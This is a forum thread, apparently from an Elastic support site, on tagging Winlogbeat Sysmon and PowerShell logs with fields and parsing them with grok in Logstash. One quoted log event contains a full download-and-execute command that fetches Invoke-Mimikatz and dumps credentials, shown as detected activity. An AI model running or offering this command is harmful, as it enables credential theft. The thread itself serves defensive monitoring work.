Tagging event logs in Winlogbeat in order to filter in Logstash

ssi · November 28, 2017, 9:04pm

hello what would the solution be in winlogbeat.yml to this example from filelogbeat below

i want to do special filtering on powershell logs and thus tag them or similar once it get to logstash

here is my config from winlogbeat.yml

winlogbeat.event_logs:
  - name: "Microsoft-Windows-Sysmon/Operational"
    fields: {log_type: sysmon}
  - name: "Windows Powershell"
    ignore_older: 96h
    fields: {log_type: Powershell}

Here's an example Logstash config based on the Filebeat config you gave:

Filebeat:

filebeat:
  prospectors:
    - paths:
        - /path/to/logs/access.log
      fields:  {log_type: access}
    -   
      paths:
        - /path/to/other/logs/errors.log
      fields: {log_type: errors}

Logstash:

input {
  beats {
    port => 5044
  }
}

filter {
  if [fields][log_type] == "access" {
    mutate {
      add_field => { "foo" => "var" }
    }
  }
}

output {
  stdout { codec => rubydebug{} }
}

andrewkroh · November 28, 2017, 9:13pm

Adding fields in Winlogbeat is very similar to Filebeat. See the documentation.

winlogbeat.event_logs: 
  - name: Microsoft-Windows-Sysmon/Operational
    fields: 
      log_type: sysmon
  - name: "Windows Powershell"
    fields: 
      log_type: Powershell
    ignore_older: 96h

Then in Logstash add conditional logic based on the presence of the fields.

filter {
  if [fields][log_type] == "sysmon" {
    // Do something
  } else if [fields][log_type] == "Powershell" {
    // Do something else
  }
}

ssi · November 28, 2017, 11:59pm

thanks you i got it working

will i have to define a custom grok pattern to parse this out currently im using this

grok {
match => {"[event_data][param3]" => "CommandLine=%{GREEDYDATA:command_line}" }
}

to get a more readable format

and i get this:

ParameterBinding(Out-Default): name="InputObject"; value="@{Date=30-08-2017 18:41:03; Log=Powershell; EventID=4104; Message=Suspicious Command Line; Results=Download via Net.WebClient DownloadString Command referencing Mimikatz PowerSploit Invoke-Mimikatz.ps1 Use of PowerSploit ; Command=IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds; Decoded

i would like to get rid of the initial parameterbindng... and do a split of the data with the ; the "splitter"

would something like this be the right way to do it

filter {
grok {
patterns_dir => "/etc/logstash/patterns"
break_on_match => false
match => [
"message", "%{PS_NEWCOMMANDSTATE}",
"message", "%{PS_SEQUENCENUMBER}",
"message", "%{PS_HOSTNAME}",
"message", "%{PS_HOSTVERSION}",
"message", "%{PS_HOSTID}",
"message", "%{PS_HOSTAPPLICATION}",
"message", "%{PS_ENGINEVERSION}",
"message", "%{PS_RUNSPACEID}",
"message", "%{PS_PIPELINEID}",
"message", "%{PS_COMMANDNAME}",
"message", "%{PS_COMMANDTYPE}",
"message", "%{PS_SCRIPTNAME}",
"message", "%{PS_COMMANDPATH}",
"message", "%{PS_COMMANDLINE}"
]
}
}

found here

?

andrewkroh · November 29, 2017, 7:47pm

Can you share the raw event in JSON format as produced by Winlogbeat that you are trying to further process with Logstash. If you enable debug logging for the publish selector the events will show up in the log file. Then you can copy/paste the event here. Then I'll have a better idea if the grok is right.

For enabling debug, edit the config file to contain this and restart Winlogbeat.

logging.level: debug
logging.selectors: ["publish"]

ssi · December 2, 2017, 10:00pm

hi i found a solution to this with the "helk" siem project thats on github, thanks for taking the time to look at my questions

system · December 30, 2017, 10:00pm

This topic was automatically closed 28 days after the last reply. New replies are no longer allowed.